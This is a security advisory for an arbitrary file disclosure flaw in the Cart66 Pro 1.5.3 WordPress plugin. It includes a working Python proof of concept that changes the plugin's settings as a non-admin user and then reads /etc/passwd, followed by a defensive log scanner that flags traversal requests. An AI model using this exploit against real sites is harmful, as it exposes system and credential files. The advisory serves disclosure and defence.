Cart66 Pro 1.5.3, Arbitrary File Disclosure
Because a registered (non-admin) user is able to change the plugin's settings, an attacker can point the product folder at the filesystem root and then trigger an arbitrary file disclosure for any path of their choosing. One limitation of this vulnerability is that the attacker needs an account on the Cart66 installation (in the PoC, the user 'test').
CVSS Score: 3.5
CVSS Vector: (AV:N/AC:M/Au:S/C:P/I:N/A:N)
Attack Scope: remote
Authorization Required: Registered
Mitigation
Update to version 1.5.4.
Proof of Concept
import requests

s = requests.Session()
blog_url = 'http://localhost'
target_file = '/etc/passwd'

# Login to WordPress as a registered (non-admin) user
url = '%s/wp-login.php' % blog_url
payload = {
    "log": "test",
    "pwd": "test",
    "wp-submit": "Log+In"
}
r = s.post(url, data=payload)

# Update plugin settings: point the product folder at the filesystem root
url = '%s/wp-admin/admin-ajax.php' % blog_url
payload = {
    "action": "save_settings",
    "product_folder": "/"
}
r = s.post(url, data=payload)

# Get contents of arbitrary file through the member download handler
url = '%s/?task=member_download&path=%s' % (blog_url, target_file)
r = s.get(url)
print(r.text)
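As an added example, not part of this advisory or of the Cart66 plugin's code, the Python below works from the defender's side: it scans constructed Apache-format access-log lines for member_download requests whose path resolves outside the product folder, and it shows the containment check (a hypothetical helper, not Cart66's) that a download handler needs. The log lines, IP addresses and the product folder path are all assumptions.

```python
import re
import posixpath
from urllib.parse import urlparse, parse_qs

# Constructed Apache combined-format log lines (not taken from the advisory).
SAMPLE_LOG = """\
203.0.113.5 - - [29/Dec/2014:10:01:02 +0000] "GET /?task=member_download&path=/etc/passwd HTTP/1.1" 200 1432 "-" "python-requests/2.5"
203.0.113.5 - - [29/Dec/2014:10:01:03 +0000] "GET /?task=member_download&path=..%2F..%2Fwp-config.php HTTP/1.1" 200 2871 "-" "python-requests/2.5"
198.51.100.7 - - [29/Dec/2014:10:02:00 +0000] "GET /?task=member_download&path=ebook.pdf HTTP/1.1" 200 90211 "-" "Mozilla/5.0"
198.51.100.7 - - [29/Dec/2014:10:02:10 +0000] "GET /shop/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<uri>\S+)[^"]*" (?P<status>\d{3})'
)

def download_path(uri):
    """Return the decoded 'path' parameter of a member_download request, or None."""
    qs = parse_qs(urlparse(uri).query)  # parse_qs percent-decodes the values
    if qs.get("task", [""])[0] != "member_download":
        return None
    return qs.get("path", [""])[0]

def resolves_inside(product_folder, requested):
    """Containment check a download handler should apply (hypothetical helper, not Cart66's):
    join the request onto the configured (absolute) folder, normalise, and require the result
    to stay beneath that folder. An absolute 'requested' replaces the base in join(), so it fails."""
    base = posixpath.normpath(product_folder)
    full = posixpath.normpath(posixpath.join(base, requested))
    return posixpath.commonpath([base, full]) == base

def scan_access_log(text, product_folder="/var/www/html/wp-content/uploads/products"):
    """Return (ip, path, status) for member_download requests that escape product_folder."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        path = download_path(m.group("uri"))
        if path is not None and not resolves_inside(product_folder, path):
            hits.append((m.group("ip"), path, int(m.group("status"))))
    return hits

if __name__ == "__main__":
    for ip, path, status in scan_access_log(SAMPLE_LOG):
        print(f"{ip} pulled {path!r} from outside the product folder (HTTP {status})")
    # The advisory's root cause: once product_folder is "/", the same check passes everything.
    print(resolves_inside("/", "/etc/passwd"))  # True
```

The final print shows why the settings save itself has to be restricted to administrators: once a non-admin has set product_folder to "/", a containment check in the download handler accepts every path.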
Timeline
- 2014-12-12: Discovered
- 2014-12-12: Vendor notified
- 2014-12-15: CVE Requested
- 2014-12-15: Vendor responded
- 2014-12-22: 1.5.4 released – issue resolved
- 2014-12-29: Advisory released
- 2015-01-05: CVE Assigned